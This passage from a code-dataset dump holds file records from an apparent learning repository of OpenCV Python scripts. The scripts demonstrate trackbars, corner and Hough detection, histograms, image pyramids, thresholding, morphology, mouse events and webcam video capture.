"610542d75fb98e29be165658e0fe9782ef353167", "content_id": "4ba2b3321da79391a0cafb94c1229ece2d294f84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 743, "license_type": "no_license", "max_line_length": 62, "num_lines": 35, "path": "/Trackbar Windows_2.0.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\n\r\ncv2.namedWindow('image')\r\n\r\ndef nothing(x):\r\n print(x)\r\n\r\nswitch= 'color/gray'\r\n\r\n#Creating Trackbar\r\ncv2.createTrackbar('CP','image',10,400,nothing)\r\ncv2.createTrackbar(switch,'image',0,1,nothing)\r\n\r\nwhile(True):\r\n img= cv2.imread('lena.jpg')\r\n \r\n #Printing current position in the TrackBar\r\n pos= cv2.getTrackbarPos('CP','image')\r\n font= cv2.FONT_HERSHEY_SIMPLEX\r\n cv2.putText(img,str(pos), (50,150), font, 4, (0,0,255),10)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n s=cv2.getTrackbarPos(switch,'image')\r\n\r\n if s==0:\r\n pass\r\n else:\r\n img= cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n \r\n img= cv2.imshow('image',img)\r\n\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6472945809364319, "alphanum_fraction": 0.7014027833938599, "avg_line_length": 21.85714340209961, "blob_id": "97ed7ba78d7e10ba163388a684218e0ecb42ec6c", "content_id": "4a0d02326c0c2fdf35cca88fc51f34705877dcc1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 499, "license_type": "no_license", "max_line_length": 94, "num_lines": 21, "path": "/Shi Tomasi Corner Detector.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\n\r\n\r\nimg= cv2.imread('left01.jpg')\r\ncv2.imshow('img', img)\r\n\r\ngray= cv2.cvtColor(src=img, code=cv2.COLOR_BGR2GRAY)\r\n\r\ncorners= cv2.goodFeaturesToTrack(image=gray, maxCorners=50, qualityLevel=0.01, minDistance=10)\r\ncorners= np.uint0(corners)\r\n\r\n#Drawing circles in each detected corners\r\nfor i in corners:\r\n x, y= i.ravel()\r\n cv2.circle(img=img,center=(x, y), radius=3, color=255, thickness=-1)\r\n\r\ncv2.imshow('dst', img)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.572139322757721, "alphanum_fraction": 0.6231343150138855, "avg_line_length": 21.02857208251953, "blob_id": "79889204b1d583bdc8eb1cf34105db785439878a", "content_id": "74b1fde9b8b49930fbc8a862d4e3f99bef110991", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 804, "license_type": "no_license", "max_line_length": 46, "num_lines": 35, "path": "/Trackbar Windows_1.0.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\n\r\n#creating black image using numpy\r\nimg= np.zeros((300,512,3), np.uint8)\r\ncv2.namedWindow('image')\r\n\r\ndef nothing(x):\r\n print(x)\r\n\r\nswitch= '0:OFF\\n1:ON'\r\n\r\n#Creating Trackbar\r\ncv2.createTrackbar('B','image',0,255,nothing)\r\ncv2.createTrackbar('G','image',0,255,nothing)\r\ncv2.createTrackbar('R','image',0,255,nothing)\r\ncv2.createTrackbar(switch,'image',0,1,nothing)\r\n\r\nwhile(True):\r\n cv2.imshow('image',img)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n #Checking the position of Trackbar\r\n b= cv2.getTrackbarPos('B','image')\r\n g= cv2.getTrackbarPos('G','image')\r\n r= cv2.getTrackbarPos('R','image')\r\n s=cv2.getTrackbarPos(switch,'image')\r\n\r\n if s==0:\r\n img[:]=0\r\n else:\r\n img[:]= 
[b,g,r]\r\n\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6283048391342163, "alphanum_fraction": 0.6967340707778931, "avg_line_length": 35.82352828979492, "blob_id": "aa015066abdce917f67ad23b1d2505192fff3c73", "content_id": "8617defd20b5b099c1f504bbc9388cdf994f5317", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 643, "license_type": "no_license", "max_line_length": 130, "num_lines": 17, "path": "/Circle Detection using Hough Circle Transform.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import cv2\r\nimport numpy as np\r\n\r\nimg= cv2.imread('smarties.png')\r\ngray= cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\ngray= cv2.medianBlur(src=gray, ksize=5)\r\ncircles= cv2.HoughCircles(image=gray, method=cv2.HOUGH_GRADIENT, dp=1, minDist=20, param1=50, param2=30, minRadius=0, maxRadius=0)\r\ndetected_circles= np.uint16(np.around(circles))\r\n\r\nfor (x, y, r) in detected_circles[0, :]:\r\n cv2.circle(img=img, center=(x, y), radius=r, color=(0,255,0), thickness=3)\r\n #drawing centre of the circle\r\n cv2.circle(img=img, center=(x, y), radius=2, color=(0,255,255), thickness=3)\r\n\r\ncv2.imshow('Image',img)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n" }, { "alpha_fraction": 0.6078066825866699, "alphanum_fraction": 0.7007434964179993, "avg_line_length": 31.75, "blob_id": "22496bcfd668291f7a4ca353960dada50d3ed935", "content_id": "162eee28947b64cf604519084dca975808c6a70d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 538, "license_type": "no_license", "max_line_length": 108, "num_lines": 16, "path": "/Probabilistic Hough Transform using HoughLinesP.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\n\r\nimg= cv2.imread('sudoku.png')\r\ngray_img= cv2.cvtColor(src=img, code=cv2.COLOR_BGR2GRAY)\r\nedges= cv2.Canny(image=gray_img, threshold1=50, threshold2=150, apertureSize=3)\r\nlines= cv2.HoughLinesP(image=edges, rho=1, theta=np.pi/180, threshold=100, minLineLength=100, maxLineGap=10)\r\n\r\nfor line in lines:\r\n x1, y1, x2, y2= line[0]\r\n cv2.line(img=img, pt1=(x1, y1), pt2=(x2, y2), color=(0,255,0), thickness=2)\r\n\r\ncv2.imshow('Edge',edges)\r\ncv2.imshow('Image',img)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6739130616188049, "alphanum_fraction": 0.7220497131347656, "avg_line_length": 25.91666603088379, "blob_id": "e6f20560eef7c7240174e21911bee6be38805529", "content_id": "9b81276905b9c48a33cc8c34ab8c31c1c0bc5e73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 644, "license_type": "no_license", "max_line_length": 119, "num_lines": 24, "path": "/Harris Corner Detector.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\n\r\n\r\nimg= cv2.imread('left01.jpg')\r\ncv2.imshow('img', img)\r\n\r\ngray= cv2.cvtColor(src=img, code=cv2.COLOR_BGR2GRAY)\r\ngray=np.float32(gray)\r\n\r\ndst= cv2.cornerHarris(src=gray, blockSize=2, ksize=3, k=0.04)\r\n#blocksize= 2*2 neighbourhood\r\n#ksize= Aperture parameter of Sobel derivative used.\r\n#k= Harris detector free parameter in the equation\r\n\r\ndst= cv2.dilate(src=dst, kernel=None)\r\n\r\n#Reverting back to the original image with optimal threshold value and marking all the detected corners with red color\r\nimg[dst > 0.01 * dst.max()] = [0,0,255]\r\n\r\ncv2.imshow('dst', 
img)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6224226951599121, "alphanum_fraction": 0.6945876479148865, "avg_line_length": 29.1200008392334, "blob_id": "dc39dbb8fcb0067db973b10f9e5b43222b536aeb", "content_id": "fe7b06beceddbbfc8d85a43e38fa5c6ef5e6187f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 776, "license_type": "no_license", "max_line_length": 107, "num_lines": 25, "path": "/Histogram using OpenCV.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\n\r\nimg= cv2.imread('lena.jpg',0)\r\n\r\n#Creating a mask\r\nmask= np.zeros(img.shape, np.uint8)\r\nmask[100:400, 100:400]= 255\r\n\r\nmasked_img= cv2.bitwise_and(img, img, mask= mask)\r\n\r\n#Calculate histogram with mask and without mask\r\nhist_img= cv2.calcHist(images=[img], channels=[0], mask=None, histSize=[256], ranges=[0,256])\r\nhist_masked_img= cv2.calcHist(images=[masked_img], channels=[0], mask=mask, histSize=[256], ranges=[0,256])\r\n\r\nplt.subplot(3,2,1), plt.imshow(img,'gray')\r\nplt.subplot(3,2,2), plt.imshow(mask, 'gray')\r\nplt.subplot(3,2,3), plt.imshow(masked_img, 'gray')\r\nplt.subplot(3,2,4), plt.plot(hist_img)\r\nplt.subplot(3,2,5), plt.plot(hist_masked_img)\r\nplt.show()\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.7222222089767456, "alphanum_fraction": 0.7413479089736938, "avg_line_length": 33.48387145996094, "blob_id": "6420f242381b84b9c68245ad1b4f2a0e08c86e1c", "content_id": "07e3cd6fb92fb616c66d5c2743ca49a45d8e4672", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1098, "license_type": "no_license", "max_line_length": 157, "num_lines": 31, "path": "/Image Pyramids.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "#Pyramid representation is a type of multi-scale signal representation in which an Image is subject to repeated smoothing and subsampling.\r\n#Two types: (i)Gaussian Pyramid (ii)Laplacian Pyramid.\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\nimg= cv2.imread('lena.jpg',1)\r\nlayer= img.copy()\r\ngaussian_pyramid= [layer]\r\n\r\nfor i in range(6):\r\n layer= cv2.pyrDown(layer)\r\n gaussian_pyramid.append(layer)\r\n cv2.imshow(str(i), layer)\r\n\r\n#Laplacian Pyramids are formed using Gaussian Pyramid.\r\n#A level in Laplacian Pyramid is formed by the difference between that level in Gaussian Pyramid and expanded version of its upper level in Gaussian Pyramid.\r\n#Laplacian Pyramids are used in Blending and Reconstruction of Images. 
\r\n\r\nlayer= gaussian_pyramid[5]\r\ncv2.imshow('upper level Gaussian Pyramid', layer)\r\nlaplacian_pyramid= [layer]\r\n\r\nfor i in range(5, 0, -1):\r\n gaussian_extended= cv2.pyrUp(gaussian_pyramid[i])\r\n laplacian= cv2.subtract(src1=gaussian_pyramid[i-1], src2=gaussian_extended)\r\n cv2.imshow(str(i), laplacian)\r\n\r\ncv2.imshow('Original', img)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.5352532267570496, "alphanum_fraction": 0.6216484904289246, "avg_line_length": 34.03571319580078, "blob_id": "7107df0141f4bd74401ba853ca847005b7349d9c", "content_id": "a0f649742d4bb4914337511e2ef7cfb19ad85007", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1007, "license_type": "no_license", "max_line_length": 79, "num_lines": 28, "path": "/Hough Line Transform using HoughLines method.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\n\r\nimg= cv2.imread('sudoku.png')\r\ngray_img= cv2.cvtColor(src=img, code=cv2.COLOR_BGR2GRAY)\r\nedges= cv2.Canny(image=gray_img, threshold1=50, threshold2=150, apertureSize=3)\r\nlines= cv2.HoughLines(image=edges, rho=1, theta=np.pi/180, threshold=200)\r\n\r\nfor line in lines:\r\n rho, theta= line[0]\r\n a= np.cos(theta)\r\n b= np.sin(theta)\r\n x0= a*rho\r\n y0= b*rho\r\n #x1 stores the rounded off value of (r * cos(theta) - 1000 * sin(theta))\r\n x1= int(x0 + 1000 * (-b))\r\n #y1 stores the rounded off value of (r * sin(theta) + 1000 * cos(theta))\r\n y1= int(y0 + 1000 * (a))\r\n #x2 stores the rounded off value of (r * cos(theta) + 1000 * sin(theta))\r\n x2= int(x0 - 1000 * (-b))\r\n #y2 stores the rounded off value of (r * sin(theta) - 1000 * cos(theta))\r\n y2= int(y0 - 1000 * (a))\r\n cv2.line(img=img, pt1=(x1, y1), pt2=(x2, y2), color=(0,0,255), thickness=2)\r\n\r\ncv2.imshow('Edge',edges)\r\ncv2.imshow('Image',img)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.5773955583572388, "alphanum_fraction": 0.6560196280479431, "avg_line_length": 19.526315689086914, "blob_id": "73f8f016423e7b11fde4552a83f945af516cb92e", "content_id": "55398725ef35f92c8fe3ea9e102310eca06da3f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 407, "license_type": "no_license", "max_line_length": 44, "num_lines": 19, "path": "/Histogram on Lena Image using matplotlib.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\n\r\nimg= cv2.imread('lena.jpg',1)\r\nb, g, r= cv2.split(img)\r\n\r\ncv2.imshow('img',img)\r\ncv2.imshow('Blue',b)\r\ncv2.imshow('Green',g)\r\ncv2.imshow('Red',r)\r\n\r\nplt.hist(b.ravel(), bins=256, range=[0,256])\r\nplt.hist(g.ravel(), bins=256, range=[0,256])\r\nplt.hist(r.ravel(), bins=256, range=[0,256])\r\nplt.show()\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6113795042037964, "alphanum_fraction": 0.6570048332214355, "avg_line_length": 49.80555725097656, "blob_id": "0e6742cecaea688c2646c816ec2699b9d58d9c14", "content_id": "b067228ac28bfe23faefb63573d96cea1535ca28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1863, "license_type": "no_license", "max_line_length": 131, "num_lines": 36, "path": "/Detecting Simple Geometrical Shapes on Image.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as 
np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\n\r\nimg= cv2.imread('shapes.png',0)\r\n_, thresh= cv2.threshold(src=img, thresh=240, maxval=255, type=cv2.THRESH_BINARY)\r\ncontours, _= cv2.findContours(image=thresh, mode=cv2.RETR_TREE, method=cv2.CHAIN_APPROX_NONE)\r\n\r\nfor contour in contours:\r\n approx= cv2.approxPolyDP(curve=contour, epsilon=0.01*cv2.arcLength(contour, True), closed=True)\r\n #cv2.approxPolyDP approximates each contour as a polygon, to precision epsilon.\r\n cv2.drawContours(image=img, contours=[approx], contourIdx=0, color=(0,0,0), thickness=5)\r\n #Printing out the shape\r\n x= approx.ravel()[0] #x-coordinate\r\n y= approx.ravel()[1] #y-coordinate\r\n if len(approx)== 3:\r\n cv2.putText(img=img, text='Triangle', org=(x, y), fontFace=cv2.FONT_HERSHEY_COMPLEX, fontScale=0.5, color=(0,0,0))\r\n elif len(approx)== 4:\r\n #Deciding whether the shape is square or rectangle\r\n x, y, w, h= cv2.boundingRect(approx)\r\n aspectRatio= float(w)/h\r\n print(aspectRatio)\r\n if aspectRatio >= 0.95 and aspectRatio <= 1.05:\r\n cv2.putText(img=img, text='Square', org=(x, y), fontFace=cv2.FONT_HERSHEY_COMPLEX, fontScale=0.5, color=(0,0,0))\r\n else:\r\n cv2.putText(img=img, text='Rectangle', org=(x, y), fontFace=cv2.FONT_HERSHEY_COMPLEX, fontScale=0.5, color=(0,0,0)) \r\n elif len(approx)== 5:\r\n cv2.putText(img=img, text='Pentagon', org=(x, y), fontFace=cv2.FONT_HERSHEY_COMPLEX, fontScale=0.5, color=(0,0,0))\r\n elif len(approx)== 6:\r\n cv2.putText(img=img, text='Hexagon', org=(x, y), fontFace=cv2.FONT_HERSHEY_COMPLEX, fontScale=0.5, color=(0,0,0))\r\n else:\r\n cv2.putText(img=img, text='Circle', org=(x, y), fontFace=cv2.FONT_HERSHEY_COMPLEX, fontScale=0.5, color=(0,0,0))\r\n\r\ncv2.imshow('shapes',img)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.5941422581672668, "alphanum_fraction": 0.6474895477294922, "avg_line_length": 27.875, "blob_id": "6b8420518781ee83fb6813fd2ea6e5fa16b0a7e2", "content_id": "0df0c62db331c1c9a78a2d251a168f88f156ac83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 956, "license_type": "no_license", "max_line_length": 75, "num_lines": 32, "path": "/Grabbing Objects from an Image (RoI).py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import cv2\r\n\r\nimg= cv2.imread('messi5.jpg',1)\r\n\r\nprint(img.shape) #returns the tuple of number of rows, columns, and channels\r\nprint(img.size) #returns the total number of pixels\r\nprint(img.dtype) #returns image datatype \r\n\r\nb,g,r= cv2.split(img)\r\nimg= cv2.merge((b,g,r))\r\n\r\n#Grabbing the location of ball (our RoI) with mouse event:\r\ndef click_event(event, x, y, flags, param):\r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n print(x, ', ', y)\r\n font= cv2.FONT_HERSHEY_COMPLEX\r\n line= cv2.LINE_AA\r\n strXY= str(x) + ', ' + str(y) \r\n cv2.putText(img, strXY, (x, y), font, 0.5, (255,25,12), 1, line)\r\n cv2.imshow('image',img)\r\n\r\n#Copying the ball (Region of Interest) and placing it at another location:\r\nball= img[280:340,330:390]\r\nimg[273:333,100:160]= ball\r\n\r\ncv2.imshow('image',img)\r\n\r\ncv2.setMouseCallback('image', click_event)\r\ncv2.imwrite('messi_ball.jpg',img)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n" }, { "alpha_fraction": 0.5233463048934937, "alphanum_fraction": 0.5836575627326965, "avg_line_length": 25.157894134521484, "blob_id": "ab9713512581e82752bd3e087bccce5f5d76c1ac", "content_id": "2bb99c77d43ebdce42f1ba0585b9efc2e9648f68", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 514, "license_type": "no_license", "max_line_length": 62, "num_lines": 19, "path": "/Mouse Events 2.0.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import cv2\r\n\r\ndef click_event(event, x, y, flags, param):\r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n cv2.circle(img, (x, y), 3, (0,0,255), -1)\r\n points.append((x, y))\r\n if len(points) >=2:\r\n cv2.line(img,points[-1], points[-2], (255,0,0), 1)\r\n cv2.imshow('image',img)\r\n \r\nimg= cv2.imread('lena.jpg',1)\r\ncv2.imshow('image',img)\r\npoints= []\r\n\r\ncv2.setMouseCallback('image', click_event)\r\n\r\ncv2.waitKey(0)\r\ncv2.imwrite('lena_mouse_events_2.0.jpg',img)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.734910249710083, "alphanum_fraction": 0.7707993388175964, "avg_line_length": 45.230770111083984, "blob_id": "ab2bc7b15b060fa7357866b07331a52389a713de", "content_id": "856eba834f62beabffee4bf63c5b587b221e88fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1226, "license_type": "no_license", "max_line_length": 147, "num_lines": 26, "path": "/Adaptive Thresholding on Sudoku Image.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "#Adaptive Thresholding calculates thresholds for a smaller region of the Image. \r\n#Hence we get different thresholding values for different regions of the same image.\r\n#It is useful in the images in which the lighting conditionds vary pixel to pixel.\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\nimg= cv2.imread('sudoku.png',0)\r\n\r\n_, th1= cv2.threshold(src=img, thresh=127, maxval=255, type=cv2.THRESH_BINARY)\r\n\r\nth2= cv2.adaptiveThreshold(src=img, maxValue=255, adaptiveMethod=cv2.ADAPTIVE_THRESH_MEAN_C, thresholdType=cv2.THRESH_BINARY, blockSize=11,C=2)\r\n#cv2.ADAPTIVE_THRESH_MEAN_C method provides mean of the neighbourhood pixels(i.e. block size) as a threshold value. \r\n# C Constant subtracted from the mean.\r\n\r\nth3= cv2.adaptiveThreshold(src=img, maxValue=255, adaptiveMethod=cv2.ADAPTIVE_THRESH_GAUSSIAN_C, thresholdType=cv2.THRESH_BINARY, blockSize=11,C=2)\r\n#cv2.ADAPTIVE_THRESH_GAUSSIAN_C method provides gaussian weighted sum of the neighbourhood pixels(i.e. block size) as a threshold value.\r\n# C Constant subtracted from the sum.\r\n\r\ncv2.imshow('Input Image',img)\r\ncv2.imshow('Binary Thres',th1)\r\ncv2.imshow('Adaptive Mean Thres',th2)\r\ncv2.imshow('Adaptive Gaussian Thres',th3)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6767676472663879, "alphanum_fraction": 0.7171717286109924, "avg_line_length": 20.11111068725586, "blob_id": "3b36b1b1a36ef17f111ae3fddf033c8910f068cb", "content_id": "d85ca6f2371b60d7e16e30c7e5f61a8df1492eb3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 396, "license_type": "no_license", "max_line_length": 83, "num_lines": 18, "path": "/getting started with matplotlib.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\n\r\nimg1= cv2.imread('lena.jpg',1)\r\ncv2.imshow('cv2 Image',img1)\r\n\r\n#matplotlib read image in RGB formate. 
Hence, we have to convert BGR to RGB format.\r\nimg2=cv2.cvtColor(img1,cv2.COLOR_BGR2RGB)\r\n\r\nplt.imshow(img2)\r\n#To remove xticks and yticks\r\n#plt.xticks([])\r\n#plt.yticks([])\r\nplt.show()\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6790980100631714, "alphanum_fraction": 0.7094535827636719, "avg_line_length": 36.5, "blob_id": "c874ac242af77ae1f7628a4c14bac9bc5bafcf97", "content_id": "9207cdcf4e4a71fdc5a3f86387e1c6853de0e27e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1153, "license_type": "no_license", "max_line_length": 113, "num_lines": 30, "path": "/Morphological operations on Image.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\n\r\nimg= cv2.imread('smarties.png',0)\r\n_, masked_img= cv2.threshold(img, 220, 255, cv2.THRESH_BINARY_INV)\r\n\r\nkernal= np.ones((3,3), np.uint8)\r\ndilation= cv2.dilate(src= masked_img, kernel=kernal, iterations=2)\r\nerosion= cv2.erode(src=masked_img, kernel=kernal, iterations=2)\r\nopening= cv2.morphologyEx(src= masked_img, op=cv2.MORPH_OPEN, kernel=kernal)\r\nclosing= cv2.morphologyEx(src= masked_img, op=cv2.MORPH_CLOSE, kernel=kernal)\r\ngradient= cv2.morphologyEx(src= masked_img, op=cv2.MORPH_GRADIENT, kernel=kernal)\r\ntophat= cv2.morphologyEx(src= masked_img, op=cv2.MORPH_TOPHAT, kernel=kernal)\r\nblackhat= cv2.morphologyEx(src= masked_img, op=cv2.MORPH_BLACKHAT, kernel=kernal)\r\n\r\ntitles= ['smarties', 'masked img', 'dilation', 'erosion', 'opening', 'closing', 'gradient', 'tophat', 'blackhat']\r\nimages= [img, masked_img, dilation, erosion, opening, closing, gradient, tophat, blackhat]\r\n\r\nfor i in range(9):\r\n plt.subplot(3,3,i+1)\r\n plt.imshow(images[i],'gray')\r\n plt.title(titles[i])\r\n plt.xticks([])\r\n plt.yticks([])\r\n\r\nplt.show()\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.610859751701355, "alphanum_fraction": 0.6352941393852234, "avg_line_length": 27.91891860961914, "blob_id": "e3c989a449f15e62d335becceb503cd4a462337b", "content_id": "6f89c11255a27c3b8c798ec11da0a9e8c1104cd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1105, "license_type": "no_license", "max_line_length": 137, "num_lines": 37, "path": "/Showing Date and Time in Videos.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import cv2\r\nimport datetime\r\n\r\ncap=cv2.VideoCapture(0);\r\n#If we want to upload the video from computer:\r\n#cap=cv2.VideoCapture('Video Path');\r\n\r\n#Printing height and width of the video frame:\r\nprint(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\r\nprint(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n\r\n#Creating While loop to capture the frame continuously\r\n\r\nwhile (cap.isOpened()):\r\n ret, frame=cap.read()\r\n #cap.read() returns True while the capture (VideoCapture) is available, together with the current frame.\r\n # ret= True or False \r\n \r\n if ret == True:\r\n \r\n datet= str(datetime.datetime.now())\r\n font=cv2.FONT_HERSHEY_COMPLEX\r\n line= cv2.LINE_AA\r\n frame= cv2.putText(img=frame, text=datet, org=(10,50), fontFace=font, fontScale=1, color=(0,255,255), thickness=2, lineType=line)\r\n \r\n cv2.imshow('frame',frame)\r\n \r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n else: \r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n \r\n#If the video window is open and we press the 'q' 
key, all the video windows will be destroyed." }, { "alpha_fraction": 0.6258941292762756, "alphanum_fraction": 0.6573676466941833, "avg_line_length": 25.959999084472656, "blob_id": "0ccd9298357899306744641c723767d86b864212", "content_id": "bbe82226812ceab4da8ffa8d336d60f94f21cacd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1398, "license_type": "no_license", "max_line_length": 108, "num_lines": 50, "path": "/Video Capturing(Uploading) and Saving.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import cv2\r\n\r\ncap=cv2.VideoCapture(0);\r\n#If we want to upload the video from computer:\r\n#cap=cv2.VideoCapture('Video Path');\r\n\r\n#Printing height and width of the video frame:\r\nprint(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\r\nprint(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n\r\n#Setting up camera parameter(increasing height and width of video)\r\ncap.set(3, 1208) #width(3)=1208\r\ncap.set(4, 720) #height(4)=720\r\n\r\n#Saving the captured video\r\n\r\nfourcc= cv2.VideoWriter_fourcc(*'XVID')\r\nout= cv2.VideoWriter(filename='output.avi', fourcc=fourcc, fps=20.0, frameSize=(640,480))\r\n\r\nprint(cap.isOpened())\r\n\r\n#Creating While loop to capture the frame continuously\r\n\r\nwhile (cap.isOpened()):\r\n ret, frame=cap.read()\r\n \r\n #cap.read() returns True while the capture (VideoCapture) is available, together with the current frame.\r\n # ret= True or False \r\n \r\n if ret == True:\r\n #If we want gray scale video capturing then use below command:\r\n #For color video capturing, we dont need it.\r\n #gray= cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n #cv2.imshow('frame',gray)\r\n \r\n out.write(frame)\r\n\r\n cv2.imshow('frame',frame)\r\n \r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n else: \r\n break\r\n\r\nout.release()\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n \r\n#If the video window is open and we press the 'q' key, all the video windows will be destroyed.\r\n" }, { "alpha_fraction": 0.5824742317199707, "alphanum_fraction": 0.6907216310501099, "avg_line_length": 19.66666603088379, "blob_id": "a008312ea5d6dbed3eb4104db894a763e853bf01", "content_id": "cf1cd4af146b7443bfef0d5b1c4c0aee3df447c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 388, "license_type": "no_license", "max_line_length": 50, "num_lines": 18, "path": "/Merge Images.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\n\r\nimg1= cv2.imread('messi5.jpg',1)\r\nimg2= cv2.imread('opencv-logo.png',1)\r\n\r\n\r\nimg1= cv2.resize(img1,dsize=(512,512))\r\nimg2= cv2.resize(img2,dsize=(512,512))\r\n\r\nmerge_img= cv2.add(img1,img2);\r\nweighted_img=cv2.addWeighted(img1,0.9,img2,0.1,0);\r\n\r\ncv2.imshow('image',merge_img);\r\ncv2.imshow('image_',weighted_img);\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.5631999969482422, "alphanum_fraction": 0.7056000232696533, "avg_line_length": 25.2608699798584, "blob_id": "5408a6c0cbc01576b996489c61b02bc4c9b458f6", "content_id": "cae7d9f44daa1778aea46f420aed8c4cde5ddaaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 625, "license_type": "no_license", "max_line_length": 60, "num_lines": 23, "path": "/Bitwise Operations on Image.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\nfrom 
